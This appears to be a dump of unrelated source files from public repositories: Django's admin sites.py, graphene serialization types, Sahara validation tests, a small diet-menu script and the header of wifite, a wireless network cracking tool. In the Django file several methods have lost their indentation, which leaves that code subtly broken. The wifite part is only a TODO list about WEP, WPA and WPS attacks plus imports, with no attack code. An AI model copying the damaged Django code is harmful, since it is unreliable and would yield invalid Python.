        (("a", "", "b"), "a/b"),
    ]:
        assert_equal(expected, zips.join_path(*args))
@istest
def when_joining_paths_then_absolute_paths_ignore_earlier_paths():
    # An absolute segment resets the join, discarding what came before it.
    for args, expected in [
        (("a", "/b"), "/b"),
        (("a", "/b", "c"), "/b/c"),
        (("/a", "/b"), "/b"),
        (("/a",), "/a"),
    ]:
        assert_equal(expected, zips.join_path(*args))
|
krisys/django | refs/heads/master | django/contrib/admin/sites.py | 3 | from functools import update_wrapper
from django.apps import apps
from django.conf import settings
from django.contrib.admin import ModelAdmin, actions
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models.base import ModelBase
from django.http import Http404, HttpResponseRedirect
from django.template.response import TemplateResponse
from django.urls import NoReverseMatch, reverse
from django.utils import six
from django.utils.text import capfirst
from django.utils.translation import ugettext as _, ugettext_lazy
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.i18n import JavaScriptCatalog
# Collects admin checks errors; filled by AdminSite.register() when DEBUG is on.
system_check_errors = []
class AlreadyRegistered(Exception):
    """Raised by AdminSite.register() when a model is registered twice."""
    pass
class NotRegistered(Exception):
    """Raised by AdminSite.unregister() for a model that was never registered."""
    pass
class AdminSite(object):
    """
    An AdminSite object encapsulates an instance of the Django admin application, ready
    to be hooked in to your URLconf. Models are registered with the AdminSite using the
    register() method, and the get_urls() method can then be used to access Django view
    functions that present a full admin interface for the collection of registered
    models.
    """
    # Text to put at the end of each page's <title>.
    site_title = ugettext_lazy('Django site admin')
    # Text to put in each page's <h1>.
    site_header = ugettext_lazy('Django administration')
    # Text to put at the top of the admin index page.
    index_title = ugettext_lazy('Site administration')
    # URL for the "View site" link at the top of each admin page.
    site_url = '/'
    # Backing value for the empty_value_display property.
    _empty_value_display = '-'
    # Optional overrides; None means the admin's default form/templates are
    # used.  NOTE(review): consumers of these attributes are outside this view.
    login_form = None
    index_template = None
    app_index_template = None
    login_template = None
    logout_template = None
    password_change_template = None
    password_change_done_template = None
    def __init__(self, name='admin'):
        """Initialize an empty site; `name` is the instance URL namespace
        used for reversing (see the `urls` property and `current_app`)."""
        self._registry = {}  # model_class class -> admin_class instance
        self.name = name
        self._actions = {'delete_selected': actions.delete_selected}
        # Copy so globally-registered actions remain retrievable through
        # get_action() even after disable_action() removes them from _actions.
        self._global_actions = self._actions.copy()
    def register(self, model_or_iterable, admin_class=None, **options):
        """
        Registers the given model(s) with the given admin class.
        The model(s) should be Model classes, not instances.
        If an admin class isn't given, it will use ModelAdmin (the default
        admin options). If keyword arguments are given -- e.g., list_display --
        they'll be applied as options to the admin class.
        If a model is already registered, this will raise AlreadyRegistered.
        If a model is abstract, this will raise ImproperlyConfigured.
        """
        if not admin_class:
            admin_class = ModelAdmin
        if isinstance(model_or_iterable, ModelBase):
            model_or_iterable = [model_or_iterable]
        for model in model_or_iterable:
            if model._meta.abstract:
                raise ImproperlyConfigured(
                    'The model %s is abstract, so it cannot be registered with admin.' % model.__name__
                )
            if model in self._registry:
                raise AlreadyRegistered('The model %s is already registered' % model.__name__)
            # Ignore the registration if the model has been
            # swapped out.
            if not model._meta.swapped:
                # If we got **options then dynamically construct a subclass of
                # admin_class with those **options.
                if options:
                    # For reasons I don't quite understand, without a __module__
                    # the created class appears to "live" in the wrong place,
                    # which causes issues later on.
                    options['__module__'] = __name__
                    # NOTE(review): admin_class is rebound here, so with several
                    # models each dynamic class subclasses the previous one --
                    # confirm this chaining is intended.
                    admin_class = type("%sAdmin" % model.__name__, (admin_class,), options)
                # Instantiate the admin class to save in the registry
                admin_obj = admin_class(model, self)
                # Run the system checks for custom admin classes in DEBUG only.
                if admin_class is not ModelAdmin and settings.DEBUG:
                    system_check_errors.extend(admin_obj.check())
                self._registry[model] = admin_obj
def unregister(self, model_or_iterable):
"""
Unregisters the given model(s).
If a model isn't already registered, this will raise NotRegistered.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model not in self._registry:
raise NotRegistered('The model %s is not registered' % model.__name__)
del self._registry[model]
    def is_registered(self, model):
        """
        Check if a model class is registered with this `AdminSite`.
        """
        # Simple membership test against the model -> ModelAdmin registry.
        return model in self._registry
def add_action(self, action, name=None):
"""
Register an action to be available globally.
"""
name = name or action.__name__
self._actions[name] = action
self._global_actions[name] = action
    def disable_action(self, name):
        """
        Disable a globally-registered action. Raises KeyError for invalid names.
        """
        # Only _actions is touched; _global_actions still holds the action
        # so get_action() can retrieve it.
        del self._actions[name]
    def get_action(self, name):
        """
        Explicitly get a registered global action whether it's enabled or
        not. Raises KeyError for invalid names.
        """
        return self._global_actions[name]
    @property
    def actions(self):
        """
        Get all the enabled actions as an iterable of (name, func).
        """
        # six.iteritems keeps this lazy on Python 2 as well as Python 3.
        return six.iteritems(self._actions)
    @property
    def empty_value_display(self):
        # Site-wide placeholder string for empty values (defaults to '-').
        return self._empty_value_display
    @empty_value_display.setter
    def empty_value_display(self, empty_value_display):
        self._empty_value_display = empty_value_display
def has_permission(self, request):
"""
Returns True if the given HttpRequest has permission to view
*at least one* page in the admin site.
"""
return request.user.is_active and request.user.is_staff
    def admin_view(self, view, cacheable=False):
        """
        Decorator to create an admin view attached to this ``AdminSite``. This
        wraps the view and provides permission checking by calling
        ``self.has_permission``.
        You'll want to use this from within ``AdminSite.get_urls()``:
            class MyAdminSite(AdminSite):
                def get_urls(self):
                    from django.conf.urls import url
                    urls = super(MyAdminSite, self).get_urls()
                    urls += [
                        url(r'^my_view/$', self.admin_view(some_view))
                    ]
                    return urls
        By default, admin_views are marked non-cacheable using the
        ``never_cache`` decorator. If the view can be safely cached, set
        cacheable=True.
        """
        def inner(request, *args, **kwargs):
            if not self.has_permission(request):
                # Allow an unauthenticated "logout" to land on the index
                # rather than bouncing to the login page.
                if request.path == reverse('admin:logout', current_app=self.name):
                    index_path = reverse('admin:index', current_app=self.name)
                    return HttpResponseRedirect(index_path)
                # Inner import to prevent django.contrib.admin (app) from
                # importing django.contrib.auth.models.User (unrelated model).
                from django.contrib.auth.views import redirect_to_login
                return redirect_to_login(
                    request.get_full_path(),
                    reverse('admin:login', current_app=self.name)
                )
            return view(request, *args, **kwargs)
        if not cacheable:
            inner = never_cache(inner)
        # We add csrf_protect here so this function can be used as a utility
        # function for any view, without having to repeat 'csrf_protect'.
        if not getattr(view, 'csrf_exempt', False):
            inner = csrf_protect(inner)
        return update_wrapper(inner, view)
    def get_urls(self):
        """Build the full urlpattern list for this admin site: site-wide
        views, one sub-tree per registered model, and per-app index pages."""
        from django.conf.urls import url, include
        # Since this module gets imported in the application's root package,
        # it cannot import models from other applications at the module level,
        # and django.contrib.contenttypes.views imports ContentType.
        from django.contrib.contenttypes import views as contenttype_views
        def wrap(view, cacheable=False):
            # Route every view through admin_view() for permission checking.
            def wrapper(*args, **kwargs):
                return self.admin_view(view, cacheable)(*args, **kwargs)
            wrapper.admin_site = self
            return update_wrapper(wrapper, view)
        # Admin-site-wide views.
        urlpatterns = [
            url(r'^$', wrap(self.index), name='index'),
            url(r'^login/$', self.login, name='login'),
            url(r'^logout/$', wrap(self.logout), name='logout'),
            url(r'^password_change/$', wrap(self.password_change, cacheable=True), name='password_change'),
            url(r'^password_change/done/$', wrap(self.password_change_done, cacheable=True),
                name='password_change_done'),
            url(r'^jsi18n/$', wrap(self.i18n_javascript, cacheable=True), name='jsi18n'),
            url(r'^r/(?P<content_type_id>\d+)/(?P<object_id>.+)/$', wrap(contenttype_views.shortcut),
                name='view_on_site'),
        ]
        # Add in each model's views, and create a list of valid URLS for the
        # app_index
        valid_app_labels = []
        for model, model_admin in self._registry.items():
            urlpatterns += [
                url(r'^%s/%s/' % (model._meta.app_label, model._meta.model_name), include(model_admin.urls)),
            ]
            if model._meta.app_label not in valid_app_labels:
                valid_app_labels.append(model._meta.app_label)
        # If there were ModelAdmins registered, we should have a list of app
        # labels for which we need to allow access to the app_index view,
        if valid_app_labels:
            regex = r'^(?P<app_label>' + '|'.join(valid_app_labels) + ')/$'
            urlpatterns += [
                url(regex, wrap(self.app_index), name='app_list'),
            ]
        return urlpatterns
    @property
    def urls(self):
        """
        The 3-tuple expected by include(): (urlpatterns, application
        namespace, instance namespace).
        """
        return self.get_urls(), 'admin', self.name
def each_context(self, request):
"""
Returns a dictionary of variables to put in the template context for
*every* page in the admin site.
For sites running on a subpath, use the SCRIPT_NAME value if site_url
hasn't been customized.
"""
script_name = request.META['SCRIPT_NAME']
site_url = script_name if self.site_url == '/' and script_name else self.site_url
return {
'site_title': self.site_title,
'site_header': self.site_header,
'site_url': site_url,
'has_permission': self.has_permission(request),
'available_apps': self.get_app_list(request),
}
    def password_change(self, request, extra_context=None):
        """
        Handles the "change password" task -- both form display and validation.

        ``extra_context`` is merged over the site-wide context from
        ``each_context()``.
        """
        from django.contrib.admin.forms import AdminPasswordChangeForm
        from django.contrib.auth.views import password_change
        url = reverse('admin:password_change_done', current_app=self.name)
        defaults = {
            'password_change_form': AdminPasswordChangeForm,
            'post_change_redirect': url,
            'extra_context': dict(self.each_context(request), **(extra_context or {})),
        }
        if self.password_change_template is not None:
            # Allow a per-site template override.
            defaults['template_name'] = self.password_change_template
        request.current_app = self.name
        return password_change(request, **defaults)
    def password_change_done(self, request, extra_context=None):
        """
        Displays the "success" page after a password change.
        """
        from django.contrib.auth.views import password_change_done
        defaults = {
            'extra_context': dict(self.each_context(request), **(extra_context or {})),
        }
        if self.password_change_done_template is not None:
            # Allow a per-site template override.
            defaults['template_name'] = self.password_change_done_template
        request.current_app = self.name
        return password_change_done(request, **defaults)
    def i18n_javascript(self, request):
        """
        Displays the i18n JavaScript that the Django admin requires.
        """
        # Build the catalog view on the fly and invoke it immediately.
        return JavaScriptCatalog.as_view(packages=['django.contrib.admin'])(request)
    @never_cache
    def logout(self, request, extra_context=None):
        """
        Logs out the user for the given HttpRequest.

        This should *not* assume the user is already logged in.
        """
        from django.contrib.auth.views import logout
        defaults = {
            'extra_context': dict(
                self.each_context(request),
                # Since the user isn't logged out at this point, the value of
                # has_permission must be overridden.
                has_permission=False,
                **(extra_context or {})
            ),
        }
        if self.logout_template is not None:
            defaults['template_name'] = self.logout_template
        request.current_app = self.name
        return logout(request, **defaults)
    @never_cache
    def login(self, request, extra_context=None):
        """
        Displays the login form for the given HttpRequest.
        """
        if request.method == 'GET' and self.has_permission(request):
            # Already logged-in, redirect to admin index
            index_path = reverse('admin:index', current_app=self.name)
            return HttpResponseRedirect(index_path)
        from django.contrib.auth.views import login
        # Since this module gets imported in the application's root package,
        # it cannot import models from other applications at the module level,
        # and django.contrib.admin.forms eventually imports User.
        from django.contrib.admin.forms import AdminAuthenticationForm
        context = dict(
            self.each_context(request),
            title=_('Log in'),
            app_path=request.get_full_path(),
        )
        if (REDIRECT_FIELD_NAME not in request.GET and
                REDIRECT_FIELD_NAME not in request.POST):
            # No explicit "next" target: fall back to the admin index.
            context[REDIRECT_FIELD_NAME] = reverse('admin:index', current_app=self.name)
        context.update(extra_context or {})
        defaults = {
            'extra_context': context,
            'authentication_form': self.login_form or AdminAuthenticationForm,
            'template_name': self.login_template or 'admin/login.html',
        }
        request.current_app = self.name
        return login(request, **defaults)
    def _build_app_dict(self, request, label=None):
        """
        Builds the app dictionary. Takes an optional label parameter to filter
        models of a specific app.

        Returns a dict keyed by app_label, or (when ``label`` is given) that
        single app's dict -- possibly None if nothing is visible.
        """
        app_dict = {}
        if label:
            models = {
                m: m_a for m, m_a in self._registry.items()
                if m._meta.app_label == label
            }
        else:
            models = self._registry
        for model, model_admin in models.items():
            app_label = model._meta.app_label
            has_module_perms = model_admin.has_module_permission(request)
            if not has_module_perms:
                if label:
                    # Requesting a specific app without module permission is
                    # an explicit failure rather than a silent skip.
                    raise PermissionDenied
                continue
            perms = model_admin.get_model_perms(request)
            # Check whether user has any perm for this module.
            # If so, add the module to the model_list.
            if True not in perms.values():
                continue
            info = (app_label, model._meta.model_name)
            model_dict = {
                'name': capfirst(model._meta.verbose_name_plural),
                'object_name': model._meta.object_name,
                'perms': perms,
            }
            if perms.get('change'):
                try:
                    model_dict['admin_url'] = reverse('admin:%s_%s_changelist' % info, current_app=self.name)
                except NoReverseMatch:
                    pass
            if perms.get('add'):
                try:
                    model_dict['add_url'] = reverse('admin:%s_%s_add' % info, current_app=self.name)
                except NoReverseMatch:
                    pass
            if app_label in app_dict:
                app_dict[app_label]['models'].append(model_dict)
            else:
                app_dict[app_label] = {
                    'name': apps.get_app_config(app_label).verbose_name,
                    'app_label': app_label,
                    'app_url': reverse(
                        'admin:app_list',
                        kwargs={'app_label': app_label},
                        current_app=self.name,
                    ),
                    'has_module_perms': has_module_perms,
                    'models': [model_dict],
                }
        if label:
            return app_dict.get(label)
        return app_dict
def get_app_list(self, request):
"""
Returns a sorted list of all the installed apps that have been
registered in this site.
"""
app_dict = self._build_app_dict(request)
# Sort the apps alphabetically.
app_list = sorted(app_dict.values(), key=lambda x: x['name'].lower())
# Sort the models alphabetically within each app.
for app in app_list:
app['models'].sort(key=lambda x: x['name'])
return app_list
    @never_cache
    def index(self, request, extra_context=None):
        """
        Displays the main admin index page, which lists all of the installed
        apps that have been registered in this site.
        """
        app_list = self.get_app_list(request)
        context = dict(
            self.each_context(request),
            title=self.index_title,
            app_list=app_list,
        )
        context.update(extra_context or {})
        request.current_app = self.name
        return TemplateResponse(request, self.index_template or 'admin/index.html', context)
    def app_index(self, request, app_label, extra_context=None):
        """
        Displays the index page for a single app (its models and their admin
        URLs).  Raises Http404 when the app is unknown or has nothing visible.
        """
        app_dict = self._build_app_dict(request, app_label)
        if not app_dict:
            raise Http404('The requested admin page does not exist.')
        # Sort the models alphabetically within each app.
        app_dict['models'].sort(key=lambda x: x['name'])
        app_name = apps.get_app_config(app_label).verbose_name
        context = dict(
            self.each_context(request),
            title=_('%(app)s administration') % {'app': app_name},
            app_list=[app_dict],
            app_label=app_label,
        )
        context.update(extra_context or {})
        request.current_app = self.name
        # Per-app template overrides the generic one when present.
        return TemplateResponse(request, self.app_index_template or [
            'admin/%s/app_index.html' % app_label,
            'admin/app_index.html'
        ], context)
# This global object represents the default admin site, for the common case.
# You can instantiate AdminSite in your own code to create a custom admin site.
site = AdminSite()  # shared default instance used by django.contrib.admin
|
wlanslovenija/django-tastypie | refs/heads/master | tastypie/contrib/contenttypes/__init__.py | 12133432 | |
mmalyska/eve-wspace | refs/heads/develop | evewspace/API/management/__init__.py | 12133432 | |
0--key/lib | refs/heads/master | portfolio/2010_Guns/guns/__init__.py | 12133432 | |
yask123/django | refs/heads/master | tests/test_discovery_sample/__init__.py | 12133432 | |
manthey/girder | refs/heads/master | plugins/curation/plugin_tests/__init__.py | 12133432 | |
msebire/intellij-community | refs/heads/master | python/testData/pyi/inspections/hiddenPyiImports/m2.py | 31 | foo = 1
bar = 2
baz = 3
|
AnCh7/sweetshot | refs/heads/master | python3-src/graphenebase/types.py | 1 | from binascii import hexlify, unhexlify
import time
from calendar import timegm
from datetime import datetime
import struct
from collections import OrderedDict
import json
from .objecttypes import object_type
timeformat = '%Y-%m-%dT%H:%M:%S%Z'
def varint(n):
    """Encode the non-negative integer *n* as a variable-length
    (LEB128-style) byte string: 7 data bits per byte, high bit set on
    every byte except the last."""
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7f) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)
def varintdecode(data):
    """Decode a variable-length (LEB128-style) integer from *data*.

    Accepts either a ``bytes`` object or a string of characters and
    returns the decoded integer.

    BUG FIX: the original always called ``ord(c)``, but iterating a
    ``bytes`` object on Python 3 yields ints, so ``ord`` raised
    TypeError.  Normalize each element to an int instead.
    """
    shift = 0
    result = 0
    for c in data:
        # bytes iteration yields ints on Python 3; str iteration yields
        # one-character strings.
        b = c if isinstance(c, int) else ord(c)
        result |= ((b & 0x7f) << shift)
        if not (b & 0x80):
            break
        shift += 7
    return result
def variable_buffer(s):
    """Prefix the byte buffer *s* with its varint-encoded length."""
    length_prefix = varint(len(s))
    return length_prefix + s
def JsonObj(data):
    """Parse ``str(data)`` as JSON and return the resulting object."""
    text = str(data)
    return json.loads(text)
class Uint8():
    """Serializer for an unsigned 8-bit integer.

    The value is stored uncoerced; ``__bytes__`` requires it to fit in
    an unsigned char.
    """
    def __init__(self, d):
        self.data = d
    def __bytes__(self):
        # little-endian unsigned char
        return struct.pack("<B", self.data)
    def __str__(self):
        return '%d' % self.data
class Int16():
    """Serializer for a signed 16-bit little-endian integer."""
    def __init__(self, d):
        self.data = int(d)
    def __bytes__(self):
        # self.data was coerced to int in __init__.
        return struct.pack("<h", int(self.data))
    def __str__(self):
        return str(self.data)
class Uint16():
    """Serializer for an unsigned 16-bit little-endian integer."""
    def __init__(self, d):
        self.data = int(d)
    def __bytes__(self):
        return struct.pack("<H", self.data)
    def __str__(self):
        return str(self.data)
class Uint32():
    """Serializer for an unsigned 32-bit little-endian integer."""
    def __init__(self, d):
        self.data = int(d)
    def __bytes__(self):
        return struct.pack("<I", self.data)
    def __str__(self):
        return str(self.data)
class Uint64():
    """Serializer for an unsigned 64-bit little-endian integer."""
    def __init__(self, d):
        self.data = int(d)
    def __bytes__(self):
        return struct.pack("<Q", self.data)
    def __str__(self):
        return str(self.data)
class Varint32():
    """Serializer for a variable-length (varint-encoded) integer."""
    def __init__(self, d):
        self.data = d
    def __bytes__(self):
        return varint(self.data)
    def __str__(self):
        return '%d' % self.data
class Int64():
    """Serializer for a signed 64-bit little-endian integer.

    NOTE(review): unlike the other fixed-width types, the value is not
    coerced with int() here -- presumably intentional; confirm upstream.
    """
    def __init__(self, d):
        self.data = d
    def __bytes__(self):
        return struct.pack("<q", self.data)
    def __str__(self):
        return '%d' % self.data
class String():
    """UTF-8 string serialized with a varint length prefix.

    Control characters are escaped by ``unicodify`` before encoding.
    """
    def __init__(self, d):
        self.data = d
    def __bytes__(self):
        d = self.unicodify()
        return varint(len(d)) + d
    def __str__(self):
        return '%s' % str(self.data)
    def unicodify(self):
        """Encode ``self.data`` to UTF-8 bytes, escaping control characters.

        NOTE(review): several escapes lack a leading backslash ("u%04x",
        "b", "f").  This is kept as-is because it defines the wire format
        this library produces -- confirm against the upstream graphene
        serializer before "fixing" it.
        """
        r = []
        for s in self.data:
            o = ord(s)
            if o <= 7:
                r.append("u%04x" % o)
            elif o == 8:
                r.append("b")
            elif o == 9:
                r.append("\t")
            elif o == 10:
                r.append("\n")
            elif o == 11:
                r.append("u%04x" % o)
            elif o == 12:
                r.append("f")
            elif o == 13:
                r.append("\r")
            elif o > 13 and o < 32:
                r.append("u%04x" % o)
            else:
                r.append(s)
        return bytes("".join(r), "utf-8")
class Bytes():
    """Length-prefixed binary blob, supplied as a hex string."""
    def __init__(self, d, length=None):
        self.data = d
        # An explicit (truthy) length wins; otherwise derive it from the data.
        self.length = length if length else len(self.data)
    def __bytes__(self):
        # FIXME constraint data to self.length
        raw = unhexlify(bytes(self.data, 'utf-8'))
        return varint(len(raw)) + raw
    def __str__(self):
        return str(self.data)
class Void():
    """Zero-byte placeholder type: serializes to nothing."""
    def __init__(self):
        pass
    def __bytes__(self):
        return b''
    def __str__(self):
        return ""
class Array():
    """Serializer for a list of serializable items, length-prefixed."""
    def __init__(self, d):
        self.data = d
        self.length = Varint32(len(self.data))
    def __bytes__(self):
        parts = [bytes(self.length)]
        parts.extend(bytes(item) for item in self.data)
        return b"".join(parts)
    def __str__(self):
        rendered = []
        for item in self.data:
            # Ids, vote ids and strings render via str(); everything else
            # is round-tripped through its JSON representation.
            if isinstance(item, (ObjectId, VoteId, String)):
                rendered.append(str(item))
            else:
                rendered.append(JsonObj(item))
        return json.dumps(rendered)
class PointInTime():
    """ISO-8601 timestamp serialized as a 32-bit seconds-since-epoch value."""
    def __init__(self, d):
        self.data = d
    def __bytes__(self):
        # Parse as UTC and pack little-endian unsigned 32-bit.
        parsed = time.strptime((self.data + "UTC"), timeformat)
        return struct.pack("<I", timegm(parsed))
    def __str__(self):
        return self.data
class Signature():
    """Raw signature bytes, rendered as a JSON hex string."""
    def __init__(self, d):
        self.data = d
    def __bytes__(self):
        return self.data
    def __str__(self):
        hex_text = hexlify(self.data).decode('ascii')
        return json.dumps(hex_text)
class Bool(Uint8):  # Bool = Uint8
    """Boolean serialized as a Uint8 (0 or 1)."""
    def __init__(self, d):
        super().__init__(d)
    def __str__(self):
        # BUG FIX: the original returned the *bool* objects True/False,
        # which makes str(Bool(...)) raise TypeError because __str__ must
        # return a str.  Render JSON booleans instead, matching the JSON
        # style used by Array/Map.
        return 'true' if self.data else 'false'
class Set(Array):  # Set = Array
    """A set is wire-identical to an Array in this protocol."""
    def __init__(self, d):
        super().__init__(d)
class Fixed_array():
    """Placeholder for the fixed-size array type (not implemented)."""
    def __init__(self, d):
        raise NotImplementedError
    def __bytes__(self):
        raise NotImplementedError
    def __str__(self):
        raise NotImplementedError
class Optional():
    """Wraps a value with a presence flag: Bool(0) when absent/empty,
    Bool(1) followed by the payload when present."""
    def __init__(self, d):
        self.data = d
    def __bytes__(self):
        if not self.data:
            return bytes(Bool(0))
        payload = bytes(self.data)
        if payload:
            return bytes(Bool(1)) + payload
        # A value that serializes to nothing counts as absent.
        return bytes(Bool(0))
    def __str__(self):
        return str(self.data)
    def isempty(self):
        """True when unset, falsy, or serializing to zero bytes."""
        return (not self.data) or (not bytes(self.data))
class Static_variant():
    """Tagged-union serializer: a varint type id followed by the value."""
    def __init__(self, d, type_id):
        self.data = d
        self.type_id = type_id
    def __bytes__(self):
        return varint(self.type_id) + bytes(self.data)
    def __str__(self):
        # BUG FIX: the original referenced the nonexistent attribute
        # ``self._type_id`` (set as ``type_id`` in __init__) and returned
        # a dict, so str() always raised.  Render the mapping as JSON,
        # consistent with Array/Map.
        return json.dumps({self.type_id: str(self.data)})
class Map():
    """Serializer for an association list of (key, value) pairs."""
    def __init__(self, data):
        self.data = data
    def __bytes__(self):
        parts = [varint(len(self.data))]
        for entry in self.data:
            parts.append(bytes(entry[0]) + bytes(entry[1]))
        return b"".join(parts)
    def __str__(self):
        rendered = [[str(entry[0]), str(entry[1])] for entry in self.data]
        return json.dumps(rendered)
class Id():
    """A bare identifier, serialized as a varint."""
    def __init__(self, d):
        self.data = Varint32(d)
    def __bytes__(self):
        return bytes(self.data)
    def __str__(self):
        return str(self.data)
class VoteId():
    """Vote identifier of the form "<type>:<instance>"."""
    def __init__(self, vote):
        parts = vote.split(":")
        assert len(parts) == 2
        self.type, self.instance = int(parts[0]), int(parts[1])
    def __bytes__(self):
        # Low byte carries the type; the remaining bytes the instance.
        packed = (self.type & 0xff) | (self.instance << 8)
        return struct.pack("<I", packed)
    def __str__(self):
        return "%d:%d" % (self.type, self.instance)
class ObjectId():
    """Encodes object/protocol ids of the form "space.type.instance"
    (e.g. "1.2.345").  Only the instance part is serialized to bytes.

    Raises Exception for malformed id strings; asserts that the type
    matches ``type_verify`` when given.
    """
    def __init__(self, object_str, type_verify=None):
        if len(object_str.split(".")) == 3:
            space, type, id = object_str.split(".")
            self.space = int(space)
            self.type = int(type)
            self.instance = Id(int(id))
            self.Id = object_str
            if type_verify:
                # NOTE: assert is stripped under ``python -O``; kept for
                # compatibility with the original behavior.  (Typo fix:
                # "Excpected" -> "Expected".)
                assert object_type[type_verify] == int(type),\
                    "Object id does not match object type! " +\
                    "Expected %d, got %d" %\
                    (object_type[type_verify], int(type))
        else:
            raise Exception("Object id is invalid")
    def __bytes__(self):
        return bytes(self.instance)  # only yield instance
    def __str__(self):
        return self.Id
|
matips/iosr-2015 | refs/heads/master | sahara/tests/unit/service/validation/test_ng_template_validation_update.py | 7 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from sahara.service import api
from sahara.service.validations import node_group_template_schema as nt
from sahara.tests.unit.service.validation import utils as u
def empty(data, **kwargs):
    """No-op validator used to stub out object creation in these tests."""
    return None
# Representative node-group-template payload used by the update tests below.
SAMPLE_DATA = {
    'name': 'a',
    'flavor_id': '42',
    'plugin_name': 'vanilla',
    'hadoop_version': '1.2.1',
    'node_processes': ['namenode',
                       'datanode',
                       'secondarynamenode',
                       'tasktracker',
                       'jobtracker'],
    'node_configs': {
        'HDFS': {
            u'hadoop.tmp.dir': '/temp/'
        }
    },
    'image_id': '550e8400-e29b-41d4-a716-446655440000',
    'volumes_per_node': 2,
    'volumes_size': 10,
    'description': 'test node template',
    'floating_ip_pool': 'd9a3bebc-f788-4b81-9a93-aa048022c1ca'
}
class TestNGTemplateUpdateValidation(u.ValidationTestCase):
    """Validation tests for node group template *update* requests."""
    def setUp(self):
        super(TestNGTemplateUpdateValidation, self).setUp()
        self._create_object_fun = empty  # updates don't create objects
        self.scheme = nt.NODE_GROUP_TEMPLATE_UPDATE_SCHEMA
        api.plugin_base.setup_plugins()
    def test_node_groups_update_nothing_required(self):
        # An empty update payload must validate: no field is mandatory.
        self._assert_create_object_validation(
            data={}
        )
    def test_ng_template_update_schema(self):
        create = copy.copy(nt.NODE_GROUP_TEMPLATE_SCHEMA)
        update = copy.copy(nt.NODE_GROUP_TEMPLATE_UPDATE_SCHEMA)
        # No required items for update
        self.assertEqual([], update["required"])
        # Other than required, schemas are equal
        del update["required"]
        del create["required"]
        self.assertEqual(create, update)
    def test_ng_template_update_v(self):
        self._assert_create_object_validation(
            data=SAMPLE_DATA
        )
        extra = copy.copy(SAMPLE_DATA)
        extra['dog'] = 'fido'
        # Unknown properties must be rejected by the schema.
        self._assert_create_object_validation(
            data=extra,
            bad_req_i=(1, "VALIDATION_ERROR",
                       "Additional properties are not allowed "
                       "('dog' was unexpected)")
        )
|
Fiware/cloud.PaaS | refs/heads/master | test/acceptance/integration/environments/get_environment_details/__init__.py | 86 | # -*- coding: utf-8 -*-
# Copyright 2014 Telefonica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with opensource@tid.es
|
mpalop/nekane | refs/heads/master | foo.py | 1 | __author__ = 'manel'
# Smoke-test script for the DietaNekane package (Python 2: uses print
# statements).  Builds a sample week's menu out of a few dishes and
# prints it.
from DietaNekane import Plato, Sentada, Periodo
# Sample dishes with nutrition data (hc = carbohydrates, calorias = calories).
p1 = Plato.Plato(u'primer plato', hc=10, calorias=20)
p2 = Plato.Plato(u'segundo plato', hc=11, calorias=21)
p3 = Plato.Plato(u'tercer plato', hc=13, calorias=23)
# One sitting of each kind, reused for every day of the week.
d = Sentada.Desayuno(p1)
m = Sentada.Merienda(p2)
c = Sentada.Comida(primero=p1, segundo=p2, postre=p3)
c2 = Sentada.Cena(primero=p1, segundo=p2, postre=p3)
dias = {
    "LUNES": Periodo.Dia("LUNES", d, c, m, c2),
    "MARTES": Periodo.Dia("MARTES", d, c, m, c2),
    "MIERCOLES": Periodo.Dia("MIERCOLES", d, c, m, c2),
    "JUEVES": Periodo.Dia("JUEVES", d, c, m, c2),
    "VIERNES": Periodo.Dia("VIERNES", d, c, m, c2),
    "SABADO": Periodo.Dia("SABADO", d, c, m, c2),
    "DOMINGO": Periodo.Dia("DOMINGO", d, c, m, c2)
}
print dias
semana = Periodo.Semana(dias)
print semana.detalle()
print semana.lista_platos()
|
rafinkarki/wifite | refs/heads/master | wifite.py | 56 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
wifite
author: derv82 at gmail
Licensed under the GNU General Public License Version 2 (GNU GPL v2),
available at: http://www.gnu.org/licenses/gpl-2.0.txt
(C) 2011 Derv Merkler
-----------------
TODO:
ignore root check when -cracked (afterward) (need root for -check?)
"cracked*" in list of AP's
Restore same command-line switch names from v1
If device already in monitor mode, check for and, if applicable, use macchanger
WPS
* Mention reaver automatically resumes sessions
* Warning about length of time required for WPS attack (*hours*)
* Show time since last successful attempt
* Percentage of tries/attempts ?
* Update code to work with reaver 1.4 ("x" sec/att)
WEP:
* ability to pause/skip/continue (done, not tested)
* Option to capture only IVS packets (uses --output-format ivs,csv)
- not compatible on older aircrack-ng's.
- Just run "airodump-ng --output-format ivs,csv", "No interface specified" = works
- would cut down on size of saved .caps
reaver:
MONITOR ACTIVITY!
- Enter ESSID when executing (?)
- Ensure WPS key attempts have begun.
- If no attempts can be made, stop attack
- During attack, if no attempts are made within X minutes, stop attack & Print
- Reaver's output when unable to associate:
[!] WARNING: Failed to associate with AA:BB:CC:DD:EE:FF (ESSID: ABCDEF)
- If failed to associate for x minutes, stop attack (same as no attempts?)
MIGHTDO:
* WPA - crack (pyrit/cowpatty) (not really important)
* Test injection at startup? (skippable via command-line switch)
"""
#############
# LIBRARIES #
#############
import os # File management
import time # Measuring attack intervals
import random # Generating a random MAC address.
import errno # Error numbers
from sys import argv # Command-line arguments
from sys import stdout, stdin # Flushing
from shutil import copy # Copying .cap files
# Executing, communicating with, killing processes
from subprocess import Popen, call, PIPE
from signal import SIGINT, SIGTERM
import re # RegEx, Converting SSID to filename
